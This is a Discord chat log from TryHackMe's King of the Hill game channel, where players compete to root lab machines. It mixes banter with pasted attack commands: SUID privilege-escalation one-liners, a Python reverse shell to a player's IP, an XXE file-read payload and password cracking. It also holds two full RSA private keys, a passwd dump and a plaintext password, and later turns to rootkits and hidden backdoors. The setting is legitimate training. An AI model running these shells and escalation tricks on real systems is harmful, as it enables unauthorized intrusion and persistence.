:wq!
#koth-voice-chat
limpid anchor
covert dawn
find / -name flag.txt 2>/dev/null
sour oasis
This is mega hard but fun
covert dawn
This is mega hard but fun
we were trying to put a funny cat in port 80
sour oasis
do you guys mind if I join your chat?
covert dawn
sure we dont mind
main current
Anyone in KOTH have a VC rn?
main current
gg everyone in last match!
trail wharf
look for partner on koth
u still looking?
covert dawn
another one
soft pebble
gg @trail wharf @covert dawn
covert dawn
ggs
trail wharf
GG
sour oasis
same, but trying to figure out mic
trail wharf
find / -perm -u=s -type f 2>/dev/null
twin hare
another one
is this a cat ?
trail wharf
dukrcrr9kv46nmeq21ufaqigf2
brisk wraith
Can I join you guys? @sour oasis
covert dawn
ssh = 9585
trail wharf
ph2o1534i6je2hab5ru0o64ad4
trail wharf
Invisibilty cloak: h@t4a06i3xw20@6u8dss6jcbn
covert dawn
ip netns exec jo /bin/sh -p
brisk wraith
How'd you figure that out? @covert dawn
covert dawn
the zip?
or the prive esc
scp file neville@10.10.55.185:/home/neville
:wq!
wget http://$IP:port/file
ip netns exec jo /bin/sh -p
@sour oasis
covert dawn
smbclient \\tyler.thm\public
root❌0:0:root:/root:/bin/bash shutdown❌6:0:shutdown:/sbin:/sbin/shutdown halt❌7:0:halt:/sbin:/sbin/halt operator❌11:0:operator:/root:/sbin/nologin ftp❌14:50:FTP User:/var/ftp:/sbin/nologin systemd-network❌192:192:systemd Network Management:/:/sbin/nologin dbus❌81:81:System message bus:/:/sbin/nologin polkitd❌999:998:User for polkitd:/:/sbin/nologin sshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix❌89:89::/var/spool/postfix:/sbin/nologin tdurden❌1000:1000:Tyler Durden:/home/tdurden:/bin/bash apache❌48:48:Apache:/usr/share/httpd:/sbin/nologin narrator❌1002:1002::/home/narrator:/bin/bash tss❌59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin librenms❌996:993::/opt/librenms:/bin/bash librenms❌996:993::/opt/librenms:/bin/bash
smbclient \\\\tyler.thm\\public
tdurden
X8JEETQmf3hkS65f
smbclient \\\\tyler.thm\\public
find / -perm -u=s -type f 2>/dev/null
brisk wraith
CMON one person share screen 😭
deep zephyr
i will
brisk wraith
Thanks, just trying to spec.
deep zephyr
after i finish phone call
brisk wraith
How long left in the match?
covert dawn
cinder jungle
y'all doing some koth rn?
covert dawn
yep
cinder jungle
oop, accidentally joined instead of spectating
either way, looks intense keep it up y'all
covert dawn
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA4Lpy4B/3/APWreOW3fccKDvGELOPcwBWjIqEtJkQNfSho8bI
FpxX1vqXKqtfQqJJXjIP4m0mCJNl6hvRDdZvWq2U7j73VIHyS9eSOK7CjKDpmqmD
+b4O1Mx0r6ORWnQ7DoI7Wrdp76i/hm4rzMh3GOMu2hQaPl57moA8SSVYJP1EykpD
zZXqKV3/N+UaKgeKRN7I060vq/jrLlvpJ8J7XgNz/3gF0c7gVfsy1r/ipo7+2ciJ
c8SDMHebX7WI1zhqaG5+Le5uKJl9WB1T8qSRj7+hd7etmOBsen0AWtFJsTUJpoia
tu7FzMIBrq3hnsHnWMip6JOJaPgFbDJCp+asBwIDAQABAoIBAQC1gyMiD/A2p8sQ
LJFAu0UM4iq6dq3Yz18YqRFC5ZaIXgzowbf/O0xfoYvTtRN+OKJV6M2Xr11W8+cP
TmRubtMGRMnUHRucMFFKHNZH3i/Zcmb8uwqT/4TvMCzXaKAQlWzV7S6PuTFhl8UK
iZXrE8fOXEENd8sysRHY2tbWpckqJbsd7BRgjK5WD/Ym81T8i8U8u9xs6b7I2KZD
H3HG/YzE39kCTpWpDJD7q7F9N8Qx/dNp8JdJTnUKnWXlGI4Y7iouc3OTPhlkrK+3
oWEsPHD8iwBGYtCvEbSiD/tciBmfMiWxaUpjq0oXY8/lssnU/AJimzgiDqymKGSX
Oie5/RERAoGBAPyBEPwS4mzoluBOuCs6y5J1+9Q3lyRRRDmEwJS0yACcy6yknrZv
Xn4zkGiEhrVFtE37GuIqstwAVGNNhIIAD2sKKDlZEOOcEwndU+Wn5MR5ELgjEkeq
idjuQ3FFyceAl1f0uiz3kxvu3XLYZDfSzzEIjFnqyBibp/X8DR0liRTDAoGBAOPW
8DQeyUbmbSCjRoHtSVOgQpm5ULp4fW4aDNJc1POhA/HdSwnhWYlzohnuNFWPCjvV
rFxw0ugJVGacxCD6U+sZ/6aAEZ/GsdvpR39OwWadPIMCUZ7BzfH2HZRSdiQXHt/r
05NNBZvx4tvrQRYKtpTuUFwdSzqwwTRl8l8RsodtAoGARGVRjHYxDv8Rn0CzckJC
0jFTPXCxaAz7RflHkQBHDKNsKB+PPit8lQKyox0CwCdZZ6YU6h5WxHDyatOciPor
MvtVWfNeN8kW/x0MlLCdrvp8JOSbFv6CyFgBvLUCqx+R3ylTJMsK9g4Fvg4PV2+q
38VI/zIxcTj4jhDwHG0GbLECgYEAtrp+oT6DrPJHWWK5vKBjK8efQozGuxbBehk4
aUp8m/xqHoOdmAn89mkf++34WRpEWeKvvt/ZtrEs2LMn9U7vGOIcEBwshlkj8jxw
1CCEqdi3XFbywQGsOz9pT7im+aD1aR9I651dP0nK6RgPdi8XafCL0KTJ3gM+oNiW
fzrBVS0CgYBsVTAcltl0KVp/DaGJ4ViOCB4bo5TYfFxRzonjQwGtwPi1xjZQ1/O+
neLKlc/V8TlDkf5/rYKchNvZKK4keeFK+8sjzBYW5vCPmMeG9BFbgqsOayQgnLEU
7LcXL2jnXY1grvsFjzXMd+5r7KSTajY5SBpXuzCJ4W71RouCDqdd8w==
-----END RSA PRIVATE KEY-----
chmod 600 id
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAsKHyvIOqmETYwUvLDAWg4ZXHb/oTgk7A4vkUY1AZC0S6fzNE
JmewL2ZJ6ioyCXhFmvlA7GC9iMJp13L5a6qeRiQEVwp6M5AYYsm/fTWXZuA2Qf4z
8o+cnnD+nswE9iLe5xPl9NvvyLANWNkn6cHkEOfQ1HYFMFP+85rmJ2o1upHkgcUI
ONDAnRigLz2IwJHeZAvllB5cszvmrLmgJWQg2DIvL/2s+J//rSEKyISmGVBxDdRm
T5ogSbSeJ9e+CfHtfOnUShWVaa2xIO49sKtu+s5LAgURtyX0MiB88NfXcUWC7uO0
Z1hd/W/rzlzKhvYlKPZON+J9ViJLNg36HqoLcwIDAQABAoIBABaM5n+Y07vS9lVf
RtIHGe4TAD5UkA8P3OJdaHPxcvEUWjcJJYc9r6mthnxF3NOGrmRFtDs5cpk2MOsX
u646PzC3QnKWXNmeaO6b0T28DNNOhr7QJHOwUA+OX4OIio2eEBUyXiZvueJGT73r
I4Rdg6+A2RF269yqrJ8PRJj9n1RtO4FPLsQ/5d6qxaHp543BMVFqYEWvrsdNU2Jl
VUAB652BcXpBuJALUV0iBsDxbqIKFl5wIsrTNWh+hkUTwo9HroQEVd4svCN+Jr5B
Npr81WG2jbKqOx2kJVFW/yCivmr/f/XokyOLBi4N/5Wqq+JuHD0zSPTtY5K04SUd
63TWQ5kCgYEA32IwfmDwGZBhqs3+QAH7y46ByIOa632DnZnFu2IqKySpTDk6chmh
ONSfc4coKwRq5T0zofHIKLYwO8vVpJq4iQ31r+oe7fAHh08w/mBC3ciCSi6EQdm5
RMxW0i4usAuneJ04rVmWWHepADB0BqYiByWtWFYAY9Kpks/ks9yWHn8CgYEAymxD
q3xvaWFycawJ+I/P5gW8+Wr1L3VrGbBRj1uPhNF0yQcA03ZjyyViDKeT/uBfCCxX
LPoLmoLYGmisl/MGq3T0g0TtrgvkFU6qZ3sjYJ+O/yrT06HYapJLv6Ns/+98uNvi
3VEQodZNII8P6WLk3RPp1NzDVcFDLmD9C40UAQ0CgYBokPgOUKZT8Sgm4mJ/5+3M
LZtHF4PvdEOmBJNw0dTXeUPesHNRcfnsNmulksEU0e6P/IQs7Jc7p30QoKwTb3Gu
hmBZxohP7So5BrLygHEMjI2g2AGFKbv2HokNvhyQwAPXDBG549Pi+bCcrBHEAwSu
v85TKX7pO3WxiauPHlUPVQKBgFmIF0ozKKgIpPDoMiTRnxfTc+kxyK6sFanwFbL9
wXXymuALi+78D1mb+Ek2mbwDC6V2zzwigJ1fwCu2Hpi6sjmF6lxhUWtI8SIHgFFy
4ovrJvlvvO9/R1SjzoM9yolNKPIut6JCJ8QdIFIFVPlad3XdR/CRkIhOieNqnKHO
TYnFAoGAbRrJYVZaJhVzgg7H22UM+sAuL6TR6hDLqD2wA1vnQvGk8qh95Mg9+M/X
6Zmia1R6Wfm2gIGirxK6s+XOpfqKncFmdjEqO+PHr4vaKSONKB0GzLI7ZlOPPU5V
Q2FZnCyRqaHlYUKWwZBt2UYbC46sfCWapormgwo3xA8Ix/jrBBI=
-----END RSA PRIVATE KEY-----
sinful nest
https://tryhackme.com/games/koth/join/7a49a4774631d8d0f2ee2df1
Oh, is room private
fervent finch
is this the king of the hill channel
covert dawn
cd /usr/bin
./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
inland verge
glacial hinge
timber pumice
Anyone down for KOTH around 5PM PDT?
whole lantern
Anyone down for KOTH ?
covert dawn
covert dawn
while true; do echo "Glitchz21" > /root/king.txt ; done &
sudo git -p help config
!/bin/sh
covert dawn
./rustscan -a 10.10.111.177 -- -A
john --wordlist=rockyou.txt
find / -perm -u=s -type f 2>/dev/null
python -c "import pty; pty.spawn('/bin/bash')"
or
ruby -e "exec '/bin/bash'"
or
perl -e "exec '/bin/bash';"
then
Ctrl+Z
then
stty raw -echo && fg
then enter and write
export TERM=xterm-256-color
zip2john file > hash
covert dawn
./ip netns add foo
./ip netns exec foo /bin/sh -p
./ip netns delete foo
cat /etc/crontab
python3 -c "import pty; pty.spawn('/bin/bash')"
crtl Z
stty raw -echo && fg
export TERM=xterm-256-color
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.180.212",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
covert dawn
find / -perm -u=s -type f 2>/dev/null
covert dawn
to read a smb file just do 'more' command uk
niceeee
trail wharf
Omg walidro new master of koth
covert dawn
zip2john application.zip
zip2john application.zip > hash
john hash
john hash --show
find / -perm -u=s -type f 2>/dev/null
covert dawn
another one
shrewd reef
Ohh
covert dawn
shrewd reef
<@881227360551194664> hahaha shell x shell very fun
lol you find?
shrewd reef
very competitive
I don't believe in giving up easy lol
sinful nest
hehehe it's part of it, I didn't know anything about koth either until I got addicted
hazy sparrow
vapid storm
vocal ginkgo
la divinia comedia,
I read the first book, on "heaven"
there were three right, heaven, purgatory and inferno,
vocal ginkgo
the pictures were interesting mostly
vocal ginkgo
not just that, all the devils/angels and different sinners projected in different places
upper fog
Oh, also, you should try Inferno by Dan Brown
Loved it
vocal ginkgo
will check it out!
rigid ember
i want to report someone is deleting flags at the room
pulsar patrol
There's only 2 in spacejam, are you sure you didn't find them all?
pulsar patrol
oh, that sucks
lone kelp
spiral karma
i want to report someone is deleting flags at the room
Report them at koth@tryhackme.com (:
include the user profile & game id (the URL in your browser)
lone kelp
im pretty sure that gcc was installed on spacejam.. and now wasnt
or maybe im wrong
😄
solid skiff
Hi
pulsar patrol
is it just me, or is there no ssh on hackers anymore?
covert dawn
sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa
sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u
covert dawn
10072
ftp 10.10.225.18 port
Open 10.10.225.18:7373
Open 10.10.225.18:7811
Open 10.10.225.18:9130
Open 10.10.225.18:9999
Open 10.10.225.18:46291
ls -la
locate zip2john
/usr/sbin/zip2john .I_save > hash.hash
solid skiff
@rigid ember 👍
rigid ember
y play well 💪 !
solid skiff
Thnx. U2
sinful nest
xD
solid skiff
ok, thnx
sinful nest
xD
solid skiff
See you next time. I am going to sleep.
covert dawn
solid skiff
Hackers
solid skiff
?! Me?!
echo gate
yes you cutie 😘
solid skiff
yes you cutie 😘
hahaha
echo gate
@split bloom I can if you're on
sinful nest
good game!
sinful nest
thank you very much, I took half of the game, I joined just for the fun
sinful nest
just subscribed to your yotube channel
Thank you very much ! 🙂
brittle stirrupBOT
Gave +1 Rep to @split bloom
vocal ginkgo
thank you very much, I took half of the game, I joined just for the fun
You lost, didn't you? And now making excuses like joined late?
sinful nest
You lost, didn't you? And now making excuses like joined late?
yes i lost
vapid storm
Didn't you join?
vocal ginkgo
Didn't you join?
Nah, I'm too old for this shit 
split bloom
you're amazing bro
vocal ginkgo
joined halfway through and still got king
I mean, the guys played 300koth games, after that much repetition, I guess it becomes smooth 🤷♂️
sinful nest
thanks
but this is all practice, i've been playing koth since the beginning of last year
echo gate
i'll be able to beat you some day MathheuZ
sinful nest
I was thinking about doing a live stream playing koth with my friends
echo gate
i'd watch you go through a koth
granite scarab
I mean, the guys played 300koth games, after that much repetition, I guess it b...
I honestly want to just create a script that fully roots the box and gets every flag as a POC, could be fun haha
vocal ginkgo
Koth becomes boring for me cuz the rooms stay the same
sinful nest
i'll be able to beat you some day MathheuZ
and go, I trust that you will win me, just like everyone else, just train, and study, determination
vocal ginkgo
I honestly want to just create a script that fully roots the box and gets every ...
Auto pawns 
The're not allowed
sinful nest
i'd watch you go through a koth
I'm talking to my friends, koth players from Brazil, to do a live playing with me
echo gate
I'm talking to my friends, koth players from Brazil, to do a live playing with m...
could you post you doing that on your youtube?
sinful nest
I honestly want to just create a script that fully roots the box and gets every ...
auto pwns is prohibited, results in permanent ban
granite scarab
The're not allowed
It’s not for actual usage, just to test how well I can code haha, also like make it multithreaded
granite scarab
auto pwns is prohibited, results in permanent ban
“as a POC”
sinful nest
the fun is to play and try to root or access in another way, and of course seeing friends with tails, or a shell vs shell, is much more fun
vocal ginkgo
“as a POC”
Sure bruh gib me when make
sinful nest
“as a POC”
understand
granite scarab
Sure bruh ~~gib me when make~~
I might even add defensive techniques haha
sinful nest
I might even add defensive techniques haha
in my recent repository I put some defense techniques, but I didn't put much, just the basics, in a few days I'll put more things
granite scarab
in my recent repository I put some defense techniques, but I didn't put much, ju...
I’ll star it, so I’ll have an idea where to start haha, btw what’s the extent of how much I can defend?
vocal ginkgo
in my recent repository I put some defense techniques, but I didn't put much, ju...
Yeh, I enjoyed the mount technique to evade the pty session killing, neat stuff
sinful nest
in my recent repository I put some defense techniques, but I didn't put much, ju...
I'm creating a list of things I can put in the repository, to help when defending the machine
vocal ginkgo
I’ll star it, so I’ll have an idea where to start haha, btw what’s the extent of...
!docs koth
proud frigateBOT
TryHackMe
vocal ginkgo
sinful nest
I’ll star it, so I’ll have an idea where to start haha, btw what’s the extent of...
most koth machines have ssh, so you can defend ssh too
granite scarab
in my recent repository I put some defense techniques, but I didn't put much, ju...
I’m pretty sure one of the rules is not use chattr binary
sinful nest
Yeh, I enjoyed the mount technique to evade the pty session killing, neat stuff
yes, i think it's cool too, especially nyancat, but i like to do it in private rooms, with my friends who also play koth here in brazil
vapid storm
<:vent:651584373778546698>
Do it!
sinful nest
I’m pretty sure one of the rules is not use chattr binary
the rule is very clear, you can remove chattr only, the other binaries are not
because chattr, you can download it on your machine and compile it, and then send it to the box, and just give execution permission and run
simple
sinful nest
Koth becomes boring for me cuz the rooms stay the same
I wish they released more new machines, it would be really cool
vocal ginkgo
I wish they released more new machines, it would be really cool
Yeh, can't remember when they last released a new one
sinful nest
Yeh, can't remember when they last released a new one
I think they are the same box as 2019
or 2020
i don't know why i started koth in 2021, in january or february
vocal ginkgo
Yep, I think they've decided not to release more boxes so the're easier to manage or something
sinful nest
could be too, I really don't know
but for now, in koth i only have in mind to live stream, or record a video playing with my friends
and finish my shell vs shell repository, defense techniques in koth, etc
split bloom
@sinful nestgood idea
sinful nest
yes
split bloom
i can play with you if u want
i'm also a content creator but i had some problems with youtube copyrights and they closed my channel
i'm starting new one if uwanna collaborate there's alot of ideas in my mind
sinful nest
i can play with you if u want
it's a good idea, my friends are brazilian, but i think it would be really cool
sinful nest
i'm also a content creator but i had some problems with youtube copyrights and t...
youtube always being annoying to people creating hacking content
sinful nest
i'm starting new one if uwanna collaborate there's alot of ideas in my mind
ok, I'll set aside a day just for this
split bloom
@sinful nest they can talk english we can have good time
split bloom
ok, I'll set aside a day just for this
take your time bro
split bloom
youtube always being annoying to people creating hacking content
yeah 🤦
pastel terrace
Hi people, i seem to have a lot of trouble to understand the chattr. the common play is to user chattr and delete it. When i tried to upload the binarie corresponding to the OS. (Create a vm ubuntu 16.04 and copy it), it never work, always missing some librairies or thing like that. Do you have a hint or something to gave me a hint on what to search. Even if it ried to install the dependencies it never work. I am new too so please be kind hahaha. To be sure i dont want the anwser but a hint
echo gate
@pastel terrace what works for me is downloading the following on your machine, move it over to the koth machine, compile it, then run it https://raw.githubusercontent.com/posborne/linux-programming-interface-exercises/master/15-file-attributes/chattr.c
solid skiff
@loud pecan 👍
loud pecan
hey @solid skiff, can I DM you?
solid skiff
hey <@!612193987251535898>, can I DM you?
No... 😉
loud pecan
🙃
rigid ember
echo gate
Had you for a second flint
I saw you used the watch command, I'm gonna start using that
inland verge
I saw you used the watch command, I'm gonna start using that
There's better ||pspy||
pulsar patrol
https://github.com/DominicBreuker/pspy
Fun fact: mount -o remount,rw,hidepid=2 /proc will keep it from working for non-root users, just in case you want to keep your enemies from doing recon
vapid storm
@sinful nest Vá jogar caixa pública
sinful nest
<@!745672959804571742> Vá jogar caixa pública
why ?
@vapid storm serivce 9999 down ?
vapid storm
<@456226577798135808> serivce 9999 down ?
@sinful nest não, está tudo bem
sinful nest
my nick is on king for more than 10 minutes and it doesn't count points, I ran scan several times in the box and it didn't find any IP
vapid storm
lol
sinful nest
now gone
sinful nest
flags are empty btw
with samba you can get the flag too
royal gust
I did try download flag.txt but was empty
sinful nest
lol
sinful nest
@royal gust
royal gust
I used smbmap
visual plank
hi can anyone help to find the directory of Nax room of THM. using gobuster but not getting error
thick socket
stiff idol
rigid ember
gg
void summit
olive patrol
rigid ember
silent socket
echo gate
can we reset, port 80 is down
vapid storm
ya
upper fog
me seeing someone using window manager: ah I see you are a man of culture as well.
@vapid storm
vapid storm
ya bro @upper fog
upper fog
Which one you using?
upper fog
@royal gust check rules.
Just putting it out there, it is not allowed, but yes, I've seen the whole thing, so yeah, its an over game anyway.
30+ mins of King time + all flags is a KO.
Been a long time seeing people shouting over nyancat 
it was fun
@charred patrol be ghosting oot there
charred patrol
@upper fog
upper fog
Why do you need to?
You can just compile on your local with --static and wget it on the target.
upper fog
Word of advise, for KoTH, efficient backdoors are way more useful then rootkits.
royal gust
na dude my rootkit can hide remote access
upper fog
Ah, have used those, again, its an one hour thing, the whole rootkit is probably an overkill for this.
also, you can compile your rootkits statically too, have it ready for all boxes.
royal gust
Ah, have used those, again, its an one hour thing, the whole rootkit is probably...
until niko kills your shell and puts nyancat on it 🤣
royal gust
also, you can compile your rootkits statically too, have it ready for all boxes.
yhyh ima try that
upper fog
Have you tried realllly persistent backdoors? Most people only kill with visible PIDs, that are based on either bash shells or pty sessions, both of which are easy to hide.
royal gust
Have you tried realllly persistent backdoors? Most people only kill with visible...
rootkit is better hides pid but also from netstat
all traffic is hidden
I think it hides user too
have to check it
upper fog
Oh yeah, def. I usually go with the kick them off before they can see the traffic approach 
But, whatever works either way.
Also for the love of god if I can work my way around my schedule and finally release the box on hold, I can tell you, rootkits will not work on future KoTH boxes. Atleast those released by me.
Backdoor will be the only persistent approach then.
royal gust
But, whatever works either way.
Also for the love of god if I can work my way a...
how so?
upper fog
I am just gonna wink here 
royal gust
we will see bout that haha
upper fog
would love to play again soon. HMU LMK if you guys play.
royal gust
yhyh I'll pm when we next play
charred patrol
is there a way to install g++ local
you can if you download the relevant packages and transfer the .deb files to the machine
BUT to compile a rootkit you have to have the kernel headers installed too and honestly it's less effort to just install the target headers on your system than to install headers+entire toolchain on the target
problem is that different machines can have different kernel versions so you need to account for that
royal gust
you *can* if you download the relevant packages and transfer the .deb files to t...
how would I copy the kernel headers to target system?
the rootkit I have use make so I prob need to install g++ .deb first I think
charred patrol
you usually get the target headers (they have to match the current running kernel) by installing the relevant package (on ubuntu it's linux-headers iirc)
and yes you'd need to install all the other utilities on the target too
that's why i said it's easier to just download the target headers onto your machine and compile it with those
few config tweaks required 🤷♂️
royal gust
yeah its gonna take some tweaks for sure
solid skiff
@rigid ember, good game. 😎 👍
rigid ember
<@!405738676816052237>, good game. 😎 👍
y played well
hope see y again🔥
solid skiff
Me too
granite hinge
Anyone down fro a game? starts in 11 minutes https://www.tryhackme.com/games/koth/41741#
First time playing KOTH
late acorn
Hey @vapid storm I see you!
vapid storm
anyone down
sonic stump
hey all
cant talk right now 😄
just watching and listening to what you are doing
not creepily
arctic elm
very much creep
sonic stump
:' )
sonic stump
yeah thats the joke
arctic elm
oh
spiral valve
are they winning? :3
sonic stump
yeah very popular KOTH vc here haha
spiral valve
@_@
arctic elm
HIIII
arctic elm
O/
spiral valve
ssh? secure shell?
sonic stump
youre doing great @late acorn 😄
sonic stump
lol
sonic stump
@late acorn grats! and with such an audience too 😄
sonic stump
bye @arctic elm
spiral valve
bye!
sonic stump
👋
arctic elm
Bye bye
sonic stump
lots of noise on your mic @onyx aspen
spiral valve
he's a 0x1 so maybe new to this 🙂
there's a free kali
they've updated not too long ago
grats for getting king 🙂
late acorn
thanks
late acorn
yeah it was completely unplanned, just was showing that guy my screen bc he sounded interested then all of a sudden there was a full audience
onyx aspen
lots of noise on your mic <@!778206146426306581>
are you sure
onyx aspen
he's a 0x1 so maybe new to this 🙂
mandy is that you?
spiral valve
sorry I am not mandy :<
inland verge
https://tryhackme.com/games/koth/join/041dc21344efc2c4003faf78
How are we doing?👀
vocal ginkgo
How are we doing?👀
wanna play/crush me?👀
vocal ginkgo
vocal ginkgo
granite scarab
Here's it - `10.10.57.94`
May I hop in too?
granite scarab
But it won't list you on the KoTH page
ah okay
inland verge
I mean, you guys can enumerate it 😄
vocal ginkgo
I mean, you guys can *enumerate* it 😄
ahem ddos
inland verge
I could join another one if you two are playing
vocal ginkgo
inland verge
ahem ~~ddos~~
Ahh no, I had inserted some PHP code
That redirects somewhere on YouTube 😄
vocal ginkgo
That redirects somewhere on YouTube 😄
inland verge
ahem ~~ddos~~
Really?
There's now about 100+ connections on the target machine, is that you?
vocal ginkgo
There's now about 100+ connections on the target machine, is that you?
uhh, i've just tried ffuf but killed it a while back
granite scarab
~~ Just found LFI ~~
vocal ginkgo
~~ Just found LFI ~~
my cursed notes are ruined/encrypted so I gave up
thought it'd be better to wait for a new game if you guys wan to?
granite scarab
I'm down, machine justr died to me anyways hahah
oh wait
nvm
I need to take doggo out
granite scarab
my cursed notes are ruined/encrypted so I gave up
why are they encrypted?
vocal ginkgo
why are they encrypted?
I transferred them from windows to linux in a jacked usb, so either different filesystems messed them,
granite scarab
I transferred them from windows to linux in a jacked usb, so either different fi...
you can send to me and I'll try to recover, You want? ~~ I'm desperate for notes please say yes ~~
inland verge
I transferred them from windows to linux in a jacked usb, so either different fi...
Windows to Linux, most of the time, messes my stuff
vocal ginkgo
Windows to Linux, most of the time, messes my stuff
Yeh, same
granite scarab
Windows to Linux, most of the time, messes my stuff
My trick is, I don't take notes
Brain is the best note taker
and google is the best syntax finder
inland verge
That wouldn't work for bigger pentests
vocal ginkgo
My trick is, I don't take notes<:kekw:658061932577816606>
just for you, 
granite scarab
also hacktricks took notes of literally everything
granite scarab
just for you, <a:aPES_Love:678210602891476992>
jesus that's alot
vocal ginkgo
just for you, <a:aPES_Love:678210602891476992>
need to add a koth in there tho
granite scarab
need to add a koth in there tho
what notes do you have on BINEX?
granite scarab
oh cool
inland verge
The ones without > are empty, right?
vocal ginkgo
The ones without `>` are empty, right?
yep
i mean, they don't have any sub-notes
the're just alone
late acorn
https://tryhackme.com/games/koth/join/16706369f0df57e055252eb3
Starts in 10 mins
golden terrace
how can I join the voice channels?
late acorn
verify with tryhackmebot first
vocal ginkgo
!docs verify
proud frigateBOT
TryHackMe
late acorn
how can I join the voice channels?
Did you figure it out?
golden terrace
ty
late acorn
anyone playing?
spiral valve
disco dancing
late acorn
grand vault
@solid skiff im stuck but i found your shell
might be the other guys though, cause i see another shell on port 82
solid skiff
it is from another guy
late acorn
Starts in 10 mins if anyone wants to join.
https://tryhackme.com/games/koth/join/e7fdb7db0d7883140dc6e38b
echo gate
are you able to portscan it?
ok now its working
why'd you reset
smh my head
the machine is dying
neon river
KoTH in a nutshell
late acorn
dang...I just deleted that....
forever online 😄
apparently in Windows you don't need quotes in echo sometext > file
fierce heath
Hi
rough plank
someone doing KOTH ? I want to spectacle someone 😉
late acorn
https://tryhackme.com/games/koth/join/fd75a20288f283675cfdfe62
starting in about 20 mins
late acorn
Starting in <7 mins
https://tryhackme.com/games/koth/42481
Ooops, here's the real linkhttps://tryhackme.com/games/koth/join/b37f351343e0bd96e9a02ebb
late acorn
https://tryhackme.com/games/koth/join/476d630fcb5c32df7d117bd6 20 mins till start
echo gate
@cosmic lodge did you create a new user named aquinas or was that a regular user
cosmic lodge
half created. shell got killed before i could set the passwd, and then i needed to run anyway
inner perch
Anyone for a koth ?
fluid sedge
@solid skiff can you not destroy us thank you ahah
brittle stirrupBOT
Gave +1 Rep to @solid skiff
solid skiff
<@!612193987251535898> can you not destroy us thank you ahah
I will slow down. I promise. 😎
neon river
why is ssh not working
whats the issue?
echo gate
@neon river i'm not exactly sure but when I tried to ssh into the koth machine it rejected me, even though an nmap scan showed the port was up with ssh
I did change the port but I don't think that should keep me from sshing into the machine unless I messed it up
neon river
🤷♂️
echo gate
i'll experiment
storm helm
I assume the boxes are the same when they boot up each time? or do they change. Like if you have played all of them you just know how to pwn it? I ask because I have tried playing KOTH a few times now and it always seem like someone is in like 2 min after the machine is up. Are they just that good?
formal terrace
I'm pretty sure they are the same
Some people take notes on them or already have flags for the machines
low tulip
I assume the boxes are the same when they boot up each time? or do they change. ...
r u talking about LxCrack ??
storm helm
Yes
low tulip
Yeah i saw him too
and i often won the games
like he hack a machine in 5-6 min and then he become a king
he is insane
storm helm
I am pretty sure he just has flags wrote down. He had 6 flags was in and hardened the machine in less the 5 min last game I as in with him.
low tulip
yeah i'm watching him right now, in "OFFLINE" machine
storm helm
I just confirmed the flags do stay in the same place. Because I got a machine that I had last night. I really don't have the skills to be trying KOTH any way but I was just thinking there is no way this guy is this good. lol
I had another guy do it last night also, but it was not that fast
low tulip
I just confirmed the flags do stay in the same place. Because I got a machine th...
yes, the flags are always in the same path
low tulip
I had another guy do it last night also, but it was not that fast
he just found 8 flags
formal terrace
on a windows machine too
low tulip
Level 1 ya right....
maybe it's not his main account
vestal beacon
He is just taking people souls lol.
Where's yours going?
low tulip
oh no LxCrack have mercy on me
is LxCrack here ?
low tulip
Lxcrack join the game
formal terrace
lmao I have never played this machine before, gonna get smoked
low tulip
which machine ?
formal terrace
I put it on production
low tulip
ow he just joined
storm helm
Welp I am not going to get even one flag lol
storm helm
Still going to try really hard
sacred epoch
Hi guys
storm helm
Ok so we know he is in discord now lol
formal terrace
yeah
sacred epoch
What do u talking about
formal terrace
I wish I set the timer for the start shorter
here's a faster one, it starts in 5 mins
sacred epoch
Guys sadly I can't join KoTH
storm helm
There is always next time.
formal terrace
rip
low tulip
https://tryhackme.com/games/koth/join/fbb0bead872823b4840ed5d6
on this new one
low tulip
Guys sadly I can't join KoTH
No probleme dude, maybe next tim
storm helm
I am in
low tulip
i have to reset my kali, i'll be back
storm helm
That was fun
low tulip
@vapid storm why did u delet the backups .sh ?
formal terrace
ggs
storm helm
gg
vapid storm
@low tulip patched
formal terrace
who's AustinW?
storm helm
me
formal terrace
oh damn
crimson ingot
Plaintext English please ♥️
storm helm
I was trying to figure out how to kick you while keeping mine lol but I had to have 2 term opend just to stop you from kicking me and locking me out
sacred epoch
Plaintext English please ♥️
Ok sir
storm helm
it was hard to manage lol
storm helm
ya I think the one you didnt find was in the e-mail I am guessing
formal terrace
oh yeah
storm helm
That was a load of fun I learned a lot.
storm helm
I am down for sure I have some things to do now but later for sure
formal terrace
ok nice
vapid storm
<@456226577798135808>
Yup
formal terrace
Did you need root permissions to read it?
vapid storm
Did you need root permissions to read it?
Yup
formal terrace
Damn
vapid storm
Hahaha
velvet kite
it takes me longer... lol
icy cipher
hi
sacred epoch
Yo
formal terrace
yo
low tulip
guys r u here for a private KOTH ?
formal terrace
I could
iron lion
god meeping darn it so many missclicks to get into this channel just to read a few messages
formal terrace
what
iron lion
shadow joined and left the general voice chat 5 times in a row to get into this channel
formal terrace
damn
low tulip
<!DOCTYPE root [<!ENTITY read SYSTEM php://filter/convert.base64-encode/resource=../controllers/Api.php> ]>
<root><id>
&read;
</id></root>
sacred epoch
<!DOCTYPE root [<!ENTITY read SYSTEM php://filter/convert.base64.encode/resource=../controllers/Api.php> ]>
<root><id>
&read;
</id></root>
sorry I can't talk much it's noisy here
formal terrace
working on it
low tulip
working on it
bruuuuuuuuuuuuh 😎
formal terrace
I'm going to do a koth event on my server next month
what kind of koth event?
low tulip
@formal terrace gg
formal terrace
ggs
I'm so dumb, I couldn't priv esc because I kept trying find as SUID and not as sudo
low tulip
there is no need to priv esc, you just had to create a reverse shelll in port 3000 and then u will immediately get root access
low tulip
The first , port 80, runs Apache whereas the second one, port 3000, runs Node.js.
sinful nest
what kind of koth event?
a tournament
formal terrace
a tournament
Oh that's actually sick
low tulip
and in port 3000 telling us the cmd argument is missing… So we're facing a command injection ...
sinful nest
Oh that's actually sick
Why?
formal terrace
